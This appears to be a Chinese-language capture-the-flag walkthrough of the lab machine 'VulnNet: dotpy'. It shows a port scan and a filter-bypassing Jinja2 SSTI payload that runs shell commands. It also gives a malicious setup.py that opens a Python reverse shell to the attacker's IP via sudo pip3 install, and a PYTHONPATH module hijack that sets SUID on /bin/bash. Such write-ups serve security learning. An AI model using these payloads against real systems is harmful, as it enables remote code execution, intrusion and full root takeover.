Skip to main content

VulnNet: dotpy

端口扫描

root@ip-10-10-239-79:~/vulnnetdotpy# nmap -sTCV -p- --min-rate 1000 10.10.78.187

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-03 11:51 BST
Nmap scan report for ip-10-10-78-187.eu-west-1.compute.internal (10.10.78.187)
Host is up (0.00034s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Werkzeug httpd 1.0.1 (Python 3.6.9)
| http-title: VulnNet Entertainment -  Login  | Discover
|_Requested resource was http://ip-10-10-78-187.eu-west-1.compute.internal:8080/login
MAC Address: 02:A0:03:86:07:81 (Unknown)

8080

访问此站点进行目录遍历也没有发现任何新的页面, 接着我访问页面并创建账号进行登陆, 在其中我发现一个页面存在 SSTI 漏洞

image-20240709161956660

因此我便开始了一系列的攻击但是我发现他过滤了一些内容, 所以我需要进行一些尝试从这里我们可以知道过滤了 : > _ [] .

image-20240709162008660

查找了一些 payload 后我发现了一个

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

image-20240709162017285

后渗透

web

利用上面得到的 payload 进行操作获取一个 Shell

image-20240709162034015

web —> system-adm

发现用户可以以 system-adm 身份执行 pip 命令, 所以我们可以借此完成攻击

(remote) web@vulnnet-dotpy:/home/web/shuriken-dotpy$ sudo -l
Matching Defaults entries for web on vulnnet-dotpy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User web may run the following commands on vulnnet-dotpy:
    (system-adm) NOPASSWD: /usr/bin/pip3 install *

(remote) web@vulnnet-dotpy:/tmp$ cat << EOF > setup.py
> import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.239.79",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
> EOF
(remote) web@vulnnet-dotpy:/tmp$ sudo -u system-adm /usr/bin/pip3 install /tmp
Processing /tmp

之后我们就可以得到一个 Shell

image-20240709162042994

system-adm —> root

接着发现用户 system-adm 可以执行 SUDO 特权去执行一个 Python 脚本同时带有 SETENV 特权, 所以我们可以利用 Python 的 PATH 提权

(remote) system-adm@vulnnet-dotpy:/home/system-adm$ sudo -l
Matching Defaults entries for system-adm on vulnnet-dotpy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User system-adm may run the following commands on vulnnet-dotpy:
    (ALL) SETENV: NOPASSWD: /usr/bin/python3 /opt/backup.py
(remote) system-adm@vulnnet-dotpy:/opt$ cat backup.py  | head -n 3
from datetime import datetime
from pathlib import Path
import zipfile
(remote) system-adm@vulnnet-dotpy:/tmp$ cat << EOF >zipfile.py
> import os
> os.system('chmod u+s /bin/bash')
> EOF
(remote) system-adm@vulnnet-dotpy:/tmp$ sudo PYTHONPATH=/tmp /usr/bin/python3 /opt/backup.py
Traceback (most recent call last):
  File "/opt/backup.py", line 32, in <module>
    zip_file = zipfile.ZipFile(str(backup_directory_path / backup_file_name), mode='w')
AttributeError: module 'zipfile' has no attribute 'ZipFile'
(remote) system-adm@vulnnet-dotpy:/tmp$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr  4  2018 /bin/bash